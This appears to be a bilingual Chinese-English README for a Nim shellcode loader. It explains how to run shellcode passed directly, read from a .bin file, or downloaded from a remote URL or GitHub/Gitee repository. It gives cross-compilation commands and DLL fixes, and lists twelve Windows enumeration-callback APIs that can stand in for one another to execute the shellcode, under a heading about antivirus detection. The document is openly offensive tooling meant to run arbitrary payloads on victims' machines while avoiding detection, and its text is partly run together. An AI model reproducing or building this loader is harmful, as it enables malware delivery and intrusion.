详见以下:details:
loader.exe payload.binloader.exe (yourshellcode)loader.exe (http://xxxx/xxx)put your url/bin/shellcode direct后面直接跟shellcode内容 或者bin文件名 或者网址就行
①use shellcode:
②use bin file
使用bin文件加载shellcode
③ load the shellcode which on your server(remote load)加载你服务器上的shellcode
Besides,You can load shellcode which on your reposiotory(gitee,github,etc.) like this
此外 你还可以把shellcode放在github,gitee的地方让loader去读
Notice:You must remove '\x' on your shellcode
注意:你必须去除你shellcode中的 \x
查杀情况
step1: setup require 安装所需的库
nimble install https://github.com/khchen/winimnimble install https://github.com/status-im/nim-stewstep2: generate exe 生成exe
nim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nimwindows上编译容易出现玄学问题 可以用debian11交叉编译 不过记得要装mingw
It's easy to have problem if you compile it on Windows Platform.In my opion,you'd better compile it on Linux
如果出现 :could not load:(libcrypto-1_1|libeay32).dllIf Go wrong with :could not load:(libcrypto-1_1|libeay32).dll
考虑是运行的平台问题 因为编译的时候i386是x86的 所以出现这个问题就把i386换成amd64
I consider this is because of the wrong command(it didn't match target's platform ),so please change "i386" to "amd64",like following
nim c --cpu:amd64 -d:mingw -d:ssl --opt:size shellcode_loader.nimIf it is compiled on windows, you don't need to add-d:mingw
如果是windows上编译 则可以不用加-d:mingw
It's possible that the shellcode_loader will go wrong with: could not load: (libcrypto-1_1-x64|libeay64).dll
你可能需要解决这些库
That means you maybe need to solve these dll
libcrypto-1_1-x64.dlllibenchant.dlllibpq.dlllibsasl.dlllibsodium.dlllibssh2.dlllibssl-1_1-x64.dllYou can find them under the floder which belong to PHP
这些库可以在windows下 php环境中找到
Also , you can download them on the Internet也可以从网上下载
源码中的EnumSystemGeoID回调函数可以换成以下函数 等价 The callback function named "EnumSystemGeoID" in my source can be replaced with following function # Callback execution EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #① EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#② EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③ EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④ EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤ EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥ EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦ EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧ EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨ EnumThreadWindows(0,csat[WNDENUMPROC](rPtr),0) #⑩ EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11 EnumWindows(cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#12
